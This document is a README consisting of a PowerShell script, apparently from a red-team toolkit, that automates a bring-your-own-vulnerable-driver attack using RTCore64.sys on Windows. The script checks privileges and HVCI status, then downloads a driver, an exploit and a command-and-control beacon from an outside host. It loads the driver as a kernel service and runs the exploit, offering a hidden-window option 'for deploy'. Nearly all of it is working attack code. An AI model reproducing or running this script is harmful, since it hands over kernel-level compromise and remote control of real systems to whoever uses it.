README.md
Rendering markdown...
# Prepare-RTCore64.ps1
# Automatiza: descarga driver + beacon + exploit → carga driver → ejecuta exploit
# Requiere: SeLoadDriverPrivilege + HVCI desactivado
Write-Host "[*] Start RTCore64.sys BYOVD Attack By LazyOwn RedTeam" -ForegroundColor Cyan
# 1. Verificar privilegios: SeLoadDriverPrivilege
Write-Host "[*] Checking Privs..." -ForegroundColor Yellow
$privs = whoami /priv 2>$null | Select-String "SeLoadDriverPrivilege"
if (-not $privs) {
Write-Error "[-] SeLoadDriverPrivilege not enabled."
exit 1
}
Write-Host "[+] SeLoadDriverPrivilege: ENABLED" -ForegroundColor Green
# 2. Verificar que HVCI/VBS está desactivado
Write-Host "[*] Check state of Virtualization-Based Security (HVCI)..." -ForegroundColor Yellow
$deviceGuard = Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard -ErrorAction SilentlyContinue
if ($deviceGuard.VirtualizationBasedSecurityStatus -ne 0) {
Write-Warning "[!] VBS/HVCI is Enabled. The exploit could be fail."
} else {
Write-Host "[+] VBS/HVCI: OFF → ¡Found VULN!" -ForegroundColor Green
}
# 3. Definir rutas y URLs
$Path = "C:\Users\Administrator\Documents\"
$DriverLocalPath = "$Path" + "RTCore64.sys"
$ExploitLocalPath = "$Path" + "exploit.exe"
$BeaconLocalPath = "$Path" + "beacon.exe"
$DriverUrl = "http://10.10.14.91/RTCore64.sys"
$ExploitUrl = "http://10.10.14.91/exploit.exe"
$BeaconUrl = "http://10.10.14.91/beacon.exe"
$ServiceName = "RTCore64"
# 4. Descargar driver si no existe
if (-not (Test-Path $DriverLocalPath)) {
Write-Host "[*] Driver not found downloading $DriverUrl..." -ForegroundColor Yellow
try {
Invoke-WebRequest -Uri $DriverUrl -OutFile $DriverLocalPath -UseBasicParsing
Write-Host "[+] Driver downloaded in $DriverLocalPath" -ForegroundColor Green
} catch {
Write-Error "[!] Error donwload driver: $_"
exit 1
}
} else {
Write-Host "[+] Driver exist in $DriverLocalPath" -ForegroundColor Green
}
# 5. Descargar exploit
Write-Host "[*] Download exploit from $ExploitUrl..." -ForegroundColor Yellow
try {
Invoke-WebRequest -Uri $ExploitUrl -OutFile $ExploitLocalPath -UseBasicParsing
Write-Host "[+] Exploit donwloaded in $ExploitLocalPath" -ForegroundColor Green
} catch {
Write-Error "[!] Error downloading exploit: $_"
exit 1
}
# 6. Descargar beacon
Write-Host "[*] Downloading beacon from $BeaconUrl..." -ForegroundColor Yellow
try {
Invoke-WebRequest -Uri $BeaconUrl -OutFile $BeaconLocalPath -UseBasicParsing
Write-Host "[+] Beacon downloaded in $BeaconLocalPath" -ForegroundColor Green
} catch {
Write-Warning "[!] Error downloading beacon: $_ (continuando sin él)"
}
# 7. Verificar si el servicio ya existe y limpiarlo
$existingService = Get-Service -Name $ServiceName -ErrorAction SilentlyContinue
if ($existingService) {
Write-Host "[*] Service $ServiceName exist, stoping and deleting..." -ForegroundColor Yellow
Stop-Service $ServiceName -Force -ErrorAction SilentlyContinue
sc.exe delete $ServiceName 2>$null
Start-Sleep -Seconds 2
}
# 8. Crear el servicio del driver
Write-Host "[*] Witchcrafting malicious service driver..." -ForegroundColor Yellow
$result = sc.exe create $ServiceName binPath= $DriverLocalPath type= kernel start= demand 2>&1
if ($LASTEXITCODE -ne 0) {
Write-Error "[!] Error witchcrafting servicio: $result"
exit 1
}
Write-Host "[+] Service $ServiceName created successfully" -ForegroundColor Green
# 9. Iniciar el servicio
Write-Host "[*] Starting service $ServiceName..." -ForegroundColor Yellow
$result = sc.exe start $ServiceName 2>&1
if ($LASTEXITCODE -ne 0) {
Write-Error "[!] Error starting the service: $result"
exit 1
}
Write-Host "[+] Service $ServiceName started successfully" -ForegroundColor Green
# 11. EJECUTAR EL EXPLOIT
Write-Host "[*] Exploiting..." -ForegroundColor Magenta
# Opción 1: Visible (recomendado para pruebas)
& $ExploitLocalPath
# Opción 2: Oculto (recomendado para deploy)
#Start-Process -FilePath $ExploitLocalPath -WindowStyle Hidden -Wait